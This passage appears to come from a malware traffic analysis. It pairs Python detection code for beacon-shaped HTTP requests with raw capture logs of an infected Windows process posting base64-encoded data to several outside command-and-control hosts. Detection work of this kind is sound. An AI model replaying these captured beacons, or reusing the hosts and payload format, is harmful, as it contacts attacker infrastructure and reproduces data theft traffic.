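CAP_223 = "OnXb2UofzV2WgS0AYcscepi+cXPVPQe3s9J4Qt+hmuedeGcRpSDjg/rmTR2XHwIg9wsPh5PbhN51uUAJ0/DT9bcjIUPNOeq4v86/lMi/UP1Y27pifoYT4Dw8t4tr+wmVCsj6U70UdvAUZvJsJ6hob7dk2471C/8t5ew/bmk5DQnm/JlIK407iFjI+iIKTPtweFaHiwi6LCIUEIPetHD1BUAKWLjO"
CAP_1239 = "OnXb2UofzV2WgS0AYcscepi+cXPVPQe3s9J4Qt+hmuWdeVURpzDjn/rmZx2SHwJi9wELh5zlhL91t3IJyODT2bcjVkPMTOqXv8q7lMy/UP1Y26"
KCK_1239 = "yZO9aB74W3A3u+petqsSxvrphm7q4bfQFN+n2K1dmYxT1cMqI8NwvoKSaVf0EOuONdRpEY0U8GhlwEhRU6i3wJAi9rqjR6jDgyLTb5uBf4w+IB"
KCK_GET = "bX=/bmdZ0vLXnogocV3t4J0vpXKy2/OoNnhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5ev2o5O2JmBXO2rvj/sbpH3UdghJzgGJYmb4kNKd7aCf9ce4Q==&RFRd_=tFLD"
MIZ_GET = "bX=HnYP2yoU4dt40olsHjvCR7kBP/y2BgIkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjcdOeiKY5v07N606wVFpuauJi0/RjjYjigABfPEh6YVaweA==&RFRd_=tFLD"

SAMPLE_REQUESTS = [  # capture order, sessions 31 to 39
    build_request("POST", "www.kckartal.xyz", "/h5qr/", body="bX=" + KCK_1239, content_length=1239),
    build_request("GET", "www.kckartal.xyz", "/h5qr/", query=KCK_GET),
    build_request("POST", "www.mizuquan.top", "/ed2j/", body="bX=" + MIZ_203, content_length=203),
    build_request("POST", "www.mizuquan.top", "/ed2j/", body="bX=" + MIZ_223, content_length=223),
    build_request("POST", "www.mizuquan.top", "/ed2j/", body="bX=" + MIZ_1239, content_length=1239),
    build_request("GET", "www.mizuquan.top", "/ed2j/", query=MIZ_GET),
    build_request("POST", "www.capbear.net", "/ijno/", body="bX=" + CAP_203, content_length=203),
    build_request("POST", "www.capbear.net", "/ijno/", body="bX=" + CAP_223, content_length=223),
    build_request("POST", "www.capbear.net", "/ijno/", body="bX=" + CAP_1239, content_length=1239),
]

def parse_request(raw):
    """Flatten one HTTP/1.1 request (head plus body) into the fields the indicators need."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    # Split by hand: urllib's parse_qs would turn '+' inside the base64 into spaces.
    pairs = (body if method == "POST" else query).split("&")
    params = dict(p.split("=", 1) for p in pairs if "=" in p)
    length = int(headers["content-length"]) if "content-length" in headers else None
    return {"method": method, "host": headers.get("host", ""), "path": path,
            "headers": headers, "params": params, "content_length": length}

def indicators(req):
    """Per-request features; each is weak alone, together they give the beacon shape."""
    h, payload = req["headers"], req["params"].get("bX", "")
    return {
        "four_char_path": bool(PATH_RE.match(req["path"])),
        "report_user_agent": h.get("user-agent") == REPORT_UA,
        "self_referer": h.get("referer") == f"http://{req['host']}{req['path']}",
        "opaque_b64_payload": bool(B64_RE.match(payload)),
        "get_marker_param": req["method"] == "GET" and req["params"].get("RFRd_") == "tFLD",
        "connection_close": h.get("connection", "").lower() == "close",
    }

def cadence_matches(seq):
    """True when the (method, Content-Length) order is a contiguous slice of the template,
    so a partial capture (first or last steps only) still matches."""
    n = len(seq)
    return 0 < n <= len(BEACON_TEMPLATE) and any(
        BEACON_TEMPLATE[i:i + n] == seq for i in range(len(BEACON_TEMPLATE) - n + 1))

def flag_hosts(raw_requests):
    """Group requests by Host and return one assessment per host."""
    by_host = defaultdict(list)
    for raw in raw_requests:
        req = parse_request(raw)
        by_host[req["host"]].append(req)
    report = {}
    for host, reqs in by_host.items():
        hits = {name for r in reqs for name, on in indicators(r).items() if on}
        posts = [r["params"].get("bX", "") for r in reqs if r["method"] == "POST"]
        cadence = cadence_matches([(r["method"], r["content_length"]) for r in reqs])
        # shared_prefix: base64 characters common to every POST body sent to this host.
        report[host] = {"requests": len(reqs), "cadence": cadence, "indicators": sorted(hits),
                        "shared_prefix": len(os.path.commonprefix(posts)) if len(posts) > 1 else None,
                        "flagged": cadence and len(hits) >= 4}
    return report
```

                              Calling flag_hosts(SAMPLE_REQUESTS) marks all three hosts as flagged. The shared_prefix field is the part worth looking at: the first 13 base64 characters of every POST body to a given host are identical (Klwv1EENmccPy for www.mizuquan.top, OnXb2UofzV2Wg for www.capbear.net, visible in the Data Ascii lines above), so the leading bytes of the payload are constant per host while the remainder changes with each request. The cadence check accepts a contiguous slice of the template, which is why www.capbear.net matches with three POSTs and no GET on this page; requiring at least four distinct indicators on top of the cadence keeps a lone benign GET that happens to carry the same User-Agent from being flagged.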


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              39 | 192.168.2.5 | 54910 | 104.207.148.137 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:32:25.830563068 CEST | 1758 | OUT | POST /ijno/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.capbear.net
                              Origin: http://www.capbear.net
                              Referer: http://www.capbear.net/ijno/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 4f 6e 58 62 32 55 6f 66 7a 56 32 57 67 53 30 41 59 63 73 63 65 70 69 2b 63 58 50 56 50 51 65 33 73 39 4a 34 51 74 2b 68 6d 75 57 64 65 56 55 52 70 7a 44 6a 6e 2f 72 6d 5a 78 32 53 48 77 4a 69 39 77 45 4c 68 35 7a 6c 68 4c 39 31 74 33 49 4a 79 4f 44 54 32 62 63 6a 56 6b 50 4d 54 4f 71 58 76 38 71 37 6c 4d 79 2f 55 50 31 59 32 36 5a 69 4a 4b 77 54 2f 7a 77 2f 71 34 74 6e 36 77 6d 78 43 73 71 42 55 36 41 69 64 66 67 55 63 2f 5a 73 4c 4d 56 6f 5a 62 64 6d 7a 34 37 74 43 2f 68 31 35 65 38 5a 62 6d 34 48 44 51 66 6d 75 49 63 68 61 35 6b 67 35 56 44 37 73 31 49 55 53 37 6c 38 62 48 48 78 71 42 57 64 48 54 77 4e 49 76 54 2f 76 6e 57 6c 63 77 51 5a 45 38 47 62 6e 79 37 4d 2f 77 4c 75 76 2b 7a 77 32 4b 63 46 72 53 62 6f 42 4f 54 6b 6f 33 53 76 48 59 70 52 5a 58 55 76 53 56 64 6d 61 36 4b 52 78 44 6e 45 35 37 78 4a 6e 6a 47 50 59 36 48 59 30 57 6c 38 38 2b 37 42 58 2f 54 63 57 41 45 45 50 34 2f 56 6c 75 4f 6b 53 57 4e 46 54 38 76 52 4b 59 44 30 73 74 57 4e 75 31 36 2b 30 73 6b 7a 30 69 48 38 78 70 6f [TRUNCATED]
                              Data Ascii: bX= [TRUNCATED]
                              Sep 16, 2024 09:32:26.424429893 CEST  384                IN         HTTP/1.1 301 Moved Permanently
                              Server: nginx/1.14.2
                              Date: Mon, 16 Sep 2024 07:32:26 GMT
                              Content-Type: text/html
                              Content-Length: 185
                              Connection: close
                              Location: https://www.capbear.net/ijno/
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>


                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
                              40          192.168.2.5  54911        104.207.148.137  80                728  C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp                             Bytes transferred  Direction  Data
                              Sep 16, 2024 09:32:28.371253967 CEST  461                OUT        GET /ijno/?bX=Dl/71iUE13/iiXwoBfJjBLiuXn/LC2nGhOcLBPqUgcWlG3I9myODuvD/dy+WEToB6xBGpoD2p7QTvgcO3M3YppYLGUXZXpGn5emzv8m+RO5fgId9MtFylBATvIp79Sr7dA==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.capbear.net
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:32:28.946494102 CEST  531                IN         HTTP/1.1 301 Moved Permanently
                              Server: nginx/1.14.2
                              Date: Mon, 16 Sep 2024 07:32:28 GMT
                              Content-Type: text/html
                              Content-Length: 185
                              Connection: close
                              Location: https://www.capbear.net/ijno/?bX=Dl/71iUE13/iiXwoBfJjBLiuXn/LC2nGhOcLBPqUgcWlG3I9myODuvD/dy+WEToB6xBGpoD2p7QTvgcO3M3YppYLGUXZXpGn5emzv8m+RO5fgId9MtFylBATvIp79Sr7dA==&RFRd_=tFLD
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>


                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
                              41          192.168.2.5  54912        185.104.29.12    80                728  C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp                             Bytes transferred  Direction  Data
                              Sep 16, 2024 09:32:34.045397043 CEST  724                OUT        POST /kdsf/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.groet.online
                              Origin: http://www.groet.online
                              Referer: http://www.groet.online/kdsf/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 72 70 6e 37 55 4f 58 4b 49 4e 42 5a 55 43 43 52 64 37 63 78 51 62 63 2b 6b 59 62 52 4f 7a 70 55 79 6e 47 2f 30 31 78 63 4e 39 6c 79 6d 79 4e 31 6e 50 77 7a 6b 2f 4e 35 47 39 70 4d 52 49 2f 39 49 45 51 71 46 41 32 46 4e 77 4c 72 57 30 32 34 58 4c 7a 73 50 4c 31 44 77 55 67 46 77 76 42 48 74 32 76 4b 73 71 55 54 43 2b 78 7a 70 46 63 6b 49 5a 6e 57 4d 44 5a 79 71 62 57 4c 2b 39 39 6e 52 55 42 2b 55 62 67 64 5a 58 59 75 78 32 45 54 54 45 62 4f 65 39 75 64 64 30 38 54 4c 73 66 56 4f 69 78 79 45 6e 48 79 66 52 52 50 6a 56 37 4f 6e 47 48 73 75 61 30 34 41 32 64 54 5a 51 77 77 4a 36 64 33 75 4f 77 3d
                              Data Ascii: bX=rpn7UOXKINBZUCCRd7cxQbc+kYbROzpUynG/01xcN9lymyN1nPwzk/N5G9pMRI/9IEQqFA2FNwLrW024XLzsPL1DwUgFwvBHt2vKsqUTC+xzpFckIZnWMDZyqbWL+99nRUB+UbgdZXYux2ETTEbOe9udd08TLsfVOixyEnHyfRRPjV7OnGHsua04A2dTZQwwJ6d3uOw=
                              Sep 16, 2024 09:32:35.473238945 CEST  1236               IN         HTTP/1.1 404 Not Found
                              date: Mon, 16 Sep 2024 07:32:34 GMT
                              x-powered-by: PHP/8.3.8
                              cache-control: must-revalidate, no-cache, private
                              access-control-allow-origin: http://www.groet.online
                              access-control-allow-credentials: true
                              access-control-expose-headers: true
                              x-drupal-dynamic-cache: UNCACHEABLE
                              content-language: en
                              x-content-type-options: nosniff
                              x-frame-options: SAMEORIGIN
                              expires: Sun, 19 Nov 1978 05:00:00 GMT
                              x-generator: Drupal 10 (https://www.drupal.org)
                              vary: Origin,Accept-Encoding,User-Agent
                              upgrade: h2,h2c
                              connection: Upgrade
                              content-encoding: gzip
                              content-length: 4175
                              content-type: text/html; charset=UTF-8
                              server: Apache
                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 5d 73 db b8 f1 3d bf 02 65 a7 77 ed 8c 21 4a b2 6c cb 3e 4b 9d c4 51 ec 24 56 ec 3b d9 77 c9 4d 67 34 10 09 89 b0 f9 a1 10 a4 6d f9 7a 8f 7d ee 4c 1f fa d4 99 4e 5f fb 0b fa 7b fa 07 da 9f 50 7c 90 14 f8 25 51 8e e4 e4 a6 ce c4 36 09 2c 16 8b c5 62 77 b1 0b e2 d9 b3 c3 5f 41 08 2e 4e 7a fd 1e 78 d9 7b 71 79 0c 20 ec aa 85 27 67 67 6f 0f c0 d7 56 e0 d8 5f cf eb 5e bd 3e ed 81 77 cf 59 fd e0 f2 f8 b8 37 b8 78 7d f6 6e 70 f0 0c 00 f0 ef bf fe f3 3f ff fa 33 e0 f0 10 5e 9b 74 5c e3 8f b5 e0 96 4c 44 f5 df fe 24 ea 94 d2 04 e9 7f ff fe 97 7f 80 17 bd e3 d7 ef c0 d1 e5 e0 e2 ac 0f 2e 7a fd f3 d3 e7 17 3d 70 76 79 71 7e 79 01 c6 be e7 80 af 0d cf c7 7a 60 61 07 53 dd b3 c9 0d f6 3d 3d c0 ce d4 46 01 2b b1 d1 cc 0b 03 3d dd 49 4c fa cb b3 a3 8b 0f e7 3d 41 02 7b e7 7f 80 8d dc 49 47 c3 ae 06 4c e2 77 34 3b f0 35 40 83 99 8d 3b 1a 84 86 67 7b 3e 84 53 9f 38 c8 9f 41 2b c4 07 cd 7a f3 9b 5c 05 45 41 e8 a3 80 78 ee c1 de fe 6f f2 f5 36 99 58 81 8b 29 3d d8 a9 6b 5d c6 89 43 [TRUNCATED]
                              Data Ascii: ]s=ew!Jl>KQ$V;wMg4mz}LN_{P|%Q6,bw_A.Nzx{qy 'ggoV_^>wY7x}np?3^t\LD$.z=pvyq~yz`aS==F+=IL=A{IGLw4;5@;g{>S8A+z\EAxo6X)=k]C#?G):Za[:OTac<FvK?"4VLLQ\rhlcSAvK mvM{4oz~E110/[$ @Z]"{|lw4kE>F7~i MYf!Qo$[r: ^^pP;sYP@"!&A
                              Sep 16, 2024 09:32:35.473280907 CEST  1236               IN         Data Raw: 0d d9 76 42 23 25 5c f8 4c 3c 46 a1 1d e8 63 c6 64 aa 1b 54 fc 0c 3f d6 6d f8 a1 ff 62 a7 ff dd d8 bb b8 7f d7 0c fa 93 ef bf bf b4 7b 2e fe e1 78 d2 b4 4f 6f ee 69 e3 78 60 8f df a0 76 8d c1 ff de c4 76 80 3a f5 af 90 33 fd 86 4b 67 c8 e8 ed 60
                              Data Ascii: vB#%\L<FcdT?mb{.xOoix`vv:3Kg`W6t".vh27wyE/>^^oy{{:x3L>7}:3,8u+x?N'0io;w[}yo//QKaJKe
                              Sep 16, 2024 09:32:35.473316908 CEST  448                IN         Data Raw: 1e bf 16 f0 ba eb 99 98 c7 b7 03 cb 63 b3 30 e1 61 3b b1 83 cb cf 12 32 0c 3c 0d 60 92 cb b9 bc 78 c5 73 39 69 c9 10 7d e4 1b 8b e9 5a 65 1a 86 4c 5e 98 a8 06 9f 12 01 13 7c 89 f0 2c 12 ea 2b 2a 05 8d 70 87 75 fe 14 17 f3 48 68 c4 dd 79 2d bc c6
                              Data Ascii: c0a;2<`xs9i}ZeL^|,+*puHhy-3DJ#{.m )Ar;6I i2;wJiGN`8)K6[h%<7L4w[u(`j\k`(ly6s:06oSGt22iY
                              Sep 16, 2024 09:32:35.473351002 CEST  1236               IN         Data Raw: 82 39 5a 4e ca 9a 62 2e 15 9d c6 e8 6c 49 1c ca da 58 fc ea e1 db 93 cf b9 af 15 f9 cf 65 7b cc f2 a1 c9 98 9d 28 17 b0 07 1c df 3a b7 b5 95 e8 cb 91 01 61 01 1d b9 f8 f7 1c fe 97 13 fb 2e a2 39 12 08 17 dd 80 82 8d 68 c2 c1 79 66 36 3e 9b c0 1a
                              Data Ascii: 9ZNb.lIXe{(:a.9hyf6>_n^J;z;9LlKk[CCm3uE(rn5J>7G7r9eBX)GSS~z8mDV(VXoeWir"SYM>"M8,S^YHM)u%
                              Sep 16, 2024 09:32:35.473387957 CEST  680                IN         Data Raw: b7 5f ae 4f 96 cf 77 46 a5 95 12 a7 7c 24 bb 52 ff fe 82 6e 1f eb eb d3 52 82 97 5c 3b 31 6f 58 b8 cd e6 24 44 8f d9 2e e2 d3 11 2b 5d 49 25 8f cd 2a c2 b6 1e 5e 44 32 a0 17 4d ad b2 ce ac 46 3c 46 01 03 94 c1 67 ee 75 64 6e 69 63 5d 51 cf 6a c4
                              Data Ascii: _OwF|$RnR\;1oX$D.+]I%*^D2MF<Fgudnic]QjmQT}@V,C&,b|]KUmA+Pt<3\+4gk#3bd\MnhBGI|L5LHt jJ>=PovEG
                              Sep 16, 2024 09:32:35.473486900 CEST  1236               IN         HTTP/1.1 404 Not Found
                              date: Mon, 16 Sep 2024 07:32:34 GMT
                              x-powered-by: PHP/8.3.8
                              cache-control: must-revalidate, no-cache, private
                              access-control-allow-origin: http://www.groet.online
                              access-control-allow-credentials: true
                              access-control-expose-headers: true
                              x-drupal-dynamic-cache: UNCACHEABLE
                              content-language: en
                              x-content-type-options: nosniff
                              x-frame-options: SAMEORIGIN
                              expires: Sun, 19 Nov 1978 05:00:00 GMT
                              x-generator: Drupal 10 (https://www.drupal.org)
                              vary: Origin,Accept-Encoding,User-Agent
                              upgrade: h2,h2c
                              connection: Upgrade
                              content-encoding: gzip
                              content-length: 4175
                              content-type: text/html; charset=UTF-8
                              server: Apache
                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 5d 73 db b8 f1 3d bf 02 65 a7 77 ed 8c 21 4a b2 6c cb 3e 4b 9d c4 51 ec 24 56 ec 3b d9 77 c9 4d 67 34 10 09 89 b0 f9 a1 10 a4 6d f9 7a 8f 7d ee 4c 1f fa d4 99 4e 5f fb 0b fa 7b fa 07 da 9f 50 7c 90 14 f8 25 51 8e e4 e4 a6 ce c4 36 09 2c 16 8b c5 62 77 b1 0b e2 d9 b3 c3 5f 41 08 2e 4e 7a fd 1e 78 d9 7b 71 79 0c 20 ec aa 85 27 67 67 6f 0f c0 d7 56 e0 d8 5f cf eb 5e bd 3e ed 81 77 cf 59 fd e0 f2 f8 b8 37 b8 78 7d f6 6e 70 f0 0c 00 f0 ef bf fe f3 3f ff fa 33 e0 f0 10 5e 9b 74 5c e3 8f b5 e0 96 4c 44 f5 df fe 24 ea 94 d2 04 e9 7f ff fe 97 7f 80 17 bd e3 d7 ef c0 d1 e5 e0 e2 ac 0f 2e 7a fd f3 d3 e7 17 3d 70 76 79 71 7e 79 01 c6 be e7 80 af 0d cf c7 7a 60 61 07 53 dd b3 c9 0d f6 3d 3d c0 ce d4 46 01 2b b1 d1 cc 0b 03 3d dd 49 4c fa cb b3 a3 8b 0f e7 3d 41 02 7b e7 7f 80 8d dc 49 47 c3 ae 06 4c e2 77 34 3b f0 35 40 83 99 8d 3b 1a 84 86 67 7b 3e 84 53 9f 38 c8 9f 41 2b c4 07 cd 7a f3 9b 5c 05 45 41 e8 a3 80 78 ee c1 de fe 6f f2 f5 36 99 58 81 8b 29 3d d8 a9 6b 5d c6 89 43 [TRUNCATED]
                              Data Ascii: ]s=ew!Jl>KQ$V;wMg4mz}LN_{P|%Q6,bw_A.Nzx{qy 'ggoV_^>wY7x}np?3^t\LD$.z=pvyq~yz`aS==F+=IL=A{IGLw4;5@;g{>S8A+z\EAxo6X)=k]C#?G):Za[:OTac<FvK?"4VLLQ\rhlcSAvK mvM{4oz~E110/[$ @Z]"{|lw4kE>F7~i MYf!Qo$[r: ^^pP;sYP@"!&A


                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
                              42          192.168.2.5  54913        185.104.29.12    80                728  C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp                             Bytes transferred  Direction  Data
                              Sep 16, 2024 09:32:36.598674059 CEST  744                OUT        POST /kdsf/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.groet.online
                              Origin: http://www.groet.online
                              Referer: http://www.groet.online/kdsf/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 72 70 6e 37 55 4f 58 4b 49 4e 42 5a 56 69 53 52 66 5a 30 78 58 37 63 78 71 34 62 52 63 7a 70 51 79 6e 43 2f 30 77 51 58 4e 76 52 79 6d 58 78 31 67 2b 77 7a 6c 2f 4e 35 4f 64 70 4a 50 34 2f 32 49 45 63 55 46 45 32 46 4e 77 66 72 57 78 4b 34 57 36 7a 6a 4f 62 31 42 32 55 67 44 2f 50 42 48 74 32 76 4b 73 71 41 31 43 2b 4a 7a 71 30 73 6b 4a 39 54 58 54 7a 5a 78 70 62 57 4c 36 39 39 6a 52 55 42 49 55 61 38 33 5a 56 51 75 78 7a 67 54 55 51 76 4e 4c 74 76 57 5a 30 39 39 50 70 75 68 4b 51 35 39 4a 78 61 4c 4b 6e 56 78 72 44 57 6b 39 6b 50 45 39 36 59 41 51 6c 56 6b 49 67 52 5a 54 5a 4e 48 77 5a 6e 65 74 47 51 71 54 39 57 4e 78 45 76 49 2f 4e 62 6b 6b 31 36 6c
                              Data Ascii: bX=rpn7UOXKINBZViSRfZ0xX7cxq4bRczpQynC/0wQXNvRymXx1g+wzl/N5OdpJP4/2IEcUFE2FNwfrWxK4W6zjOb1B2UgD/PBHt2vKsqA1C+Jzq0skJ9TXTzZxpbWL699jRUBIUa83ZVQuxzgTUQvNLtvWZ099PpuhKQ59JxaLKnVxrDWk9kPE96YAQlVkIgRZTZNHwZnetGQqT9WNxEvI/Nbkk16l
                              Sep 16, 2024 09:32:37.444453001 CEST  1236               IN         HTTP/1.1 404 Not Found
                              date: Mon, 16 Sep 2024 07:32:37 GMT
                              x-powered-by: PHP/8.3.8
                              cache-control: must-revalidate, no-cache, private
                              access-control-allow-origin: http://www.groet.online
                              access-control-allow-credentials: true
                              access-control-expose-headers: true
                              x-drupal-dynamic-cache: UNCACHEABLE
                              content-language: en
                              x-content-type-options: nosniff
                              x-frame-options: SAMEORIGIN
                              expires: Sun, 19 Nov 1978 05:00:00 GMT
                              x-generator: Drupal 10 (https://www.drupal.org)
                              vary: Origin,Accept-Encoding,User-Agent
                              upgrade: h2,h2c
                              connection: Upgrade
                              content-encoding: gzip
                              content-length: 4175
                              content-type: text/html; charset=UTF-8
                              server: Apache
                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 5d 73 db b8 f1 3d bf 02 65 a7 77 ed 8c 21 4a b2 6c cb 3e 4b 9d c4 51 ec 24 56 ec 3b d9 77 c9 4d 67 34 10 09 89 b0 f9 a1 10 a4 6d f9 7a 8f 7d ee 4c 1f fa d4 99 4e 5f fb 0b fa 7b fa 07 da 9f 50 7c 90 14 f8 25 51 8e e4 e4 a6 ce c4 36 09 2c 16 8b c5 62 77 b1 0b e2 d9 b3 c3 5f 41 08 2e 4e 7a fd 1e 78 d9 7b 71 79 0c 20 ec aa 85 27 67 67 6f 0f c0 d7 56 e0 d8 5f cf eb 5e bd 3e ed 81 77 cf 59 fd e0 f2 f8 b8 37 b8 78 7d f6 6e 70 f0 0c 00 f0 ef bf fe f3 3f ff fa 33 e0 f0 10 5e 9b 74 5c e3 8f b5 e0 96 4c 44 f5 df fe 24 ea 94 d2 04 e9 7f ff fe 97 7f 80 17 bd e3 d7 ef c0 d1 e5 e0 e2 ac 0f 2e 7a fd f3 d3 e7 17 3d 70 76 79 71 7e 79 01 c6 be e7 80 af 0d cf c7 7a 60 61 07 53 dd b3 c9 0d f6 3d 3d c0 ce d4 46 01 2b b1 d1 cc 0b 03 3d dd 49 4c fa cb b3 a3 8b 0f e7 3d 41 02 7b e7 7f 80 8d dc 49 47 c3 ae 06 4c e2 77 34 3b f0 35 40 83 99 8d 3b 1a 84 86 67 7b 3e 84 53 9f 38 c8 9f 41 2b c4 07 cd 7a f3 9b 5c 05 45 41 e8 a3 80 78 ee c1 de fe 6f f2 f5 36 99 58 81 8b 29 3d d8 a9 6b 5d c6 89 43 [TRUNCATED]
                              Data Ascii: ]s=ew!Jl>KQ$V;wMg4mz}LN_{P|%Q6,bw_A.Nzx{qy 'ggoV_^>wY7x}np?3^t\LD$.z=pvyq~yz`aS==F+=IL=A{IGLw4;5@;g{>S8A+z\EAxo6X)=k]C#?G):Za[:OTac<FvK?"4VLLQ\rhlcSAvK mvM{4oz~E110/[$ @Z]"{|lw4kE>F7~i MYf!Qo$[r: ^^pP;sYP@"!&A
                              Sep 16, 2024 09:32:37.444474936 CEST  1236               IN         Data Raw: 0d d9 76 42 23 25 5c f8 4c 3c 46 a1 1d e8 63 c6 64 aa 1b 54 fc 0c 3f d6 6d f8 a1 ff 62 a7 ff dd d8 bb b8 7f d7 0c fa 93 ef bf bf b4 7b 2e fe e1 78 d2 b4 4f 6f ee 69 e3 78 60 8f df a0 76 8d c1 ff de c4 76 80 3a f5 af 90 33 fd 86 4b 67 c8 e8 ed 60
                              Data Ascii: vB#%\L<FcdT?mb{.xOoix`vv:3Kg`W6t".vh27wyE/>^^oy{{:x3L>7}:3,8u+x?N'0io;w[}yo//QKaJKe
                              Sep 16, 2024 09:32:37.444488049 CEST  1236               IN         Data Raw: 1e bf 16 f0 ba eb 99 98 c7 b7 03 cb 63 b3 30 e1 61 3b b1 83 cb cf 12 32 0c 3c 0d 60 92 cb b9 bc 78 c5 73 39 69 c9 10 7d e4 1b 8b e9 5a 65 1a 86 4c 5e 98 a8 06 9f 12 01 13 7c 89 f0 2c 12 ea 2b 2a 05 8d 70 87 75 fe 14 17 f3 48 68 c4 dd 79 2d bc c6
                              Data Ascii: c0a;2<`xs9i}ZeL^|,+*puHhy-3DJ#{.m )Ar;6I i2;wJiGN`8)K6[h%<7L4w[u(`j\k`(ly6s:06oSGt22iY
                              Sep 16, 2024 09:32:37.444499969 CEST  1128               IN         Data Raw: 8b 82 3b cc 7d f6 42 66 c7 96 26 db 16 8c 30 97 0e 8c 90 56 0c 14 55 09 f0 54 26 33 9f 13 2c 26 66 71 ab 5f 42 66 70 61 90 b1 2c 2d a8 f2 51 4b 6d 58 17 66 03 a3 66 60 de e9 fc 9c 7f 79 7a 50 ed ac 7a 86 70 91 1e 5d 32 a2 28 64 7a 49 99 1f 10 93
